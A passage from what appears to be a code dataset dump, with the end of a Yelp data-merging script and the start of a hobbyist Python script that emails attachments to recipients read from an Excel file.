'\\n')\n\nf_rev.close()\nf_rev_name.close()\nf_score.close()\nf_cat.close()\n","repo_name":"facebookresearch/MultipleAttributeTextRewriting","sub_path":"data/Yelp/merge_yelp.py","file_name":"merge_yelp.py","file_ext":"py","file_size_in_byte":2478,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"90"}
+{"seq_id":"31223235860","text":"import smtplib\r\nfrom email.mime.text import MIMEText\r\nfrom email.mime.multipart import MIMEMultipart\r\nfrom email.mime.base import MIMEBase\r\nfrom email import encoders\r\nimport os\r\nfrom sys import *\r\nimport pandas as pd\r\n\r\ndef Send_Email(Dir_Name):\r\n email = 'abhi.dlv007@gmail.com'\r\n password = input(\"Enter password : \")\r\n Database_File = pd.read_excel('C:\\\\Users\\\\lenovo\\\\Desktop\\\\A\\\\B\\\\Database of Email.xlsx') #This reads the data of email id from the excel file present on path\r\n Receipient_obj = Database_File['Email_ID']\r\n Receipient_list = [] #Empty list to store the email id\r\n\r\n # for loop to create receipients email list\r\n for i in range(len(Receipient_obj)):\r\n # for every record get the the email addresses\r\n mail_id = Receipient_obj[i]\r\n Receipient_list.append(mail_id)\r\n\r\n # Email Body formation\r\n subject = 'Email by Automation Script Multiple receipients and attachments through database file'\r\n message = \"\"\"\r\n \r\n \r\n
Hello sir, \r\n Good Evening.😀
\r\n I am sending this email to multiple receipients with automated script and attaching multiple files present in my secondary storage device directory. \r\n Directory name is taken from user with commad line argument \r\n Email id's of receipients are taken through Database.xlsx file \r\n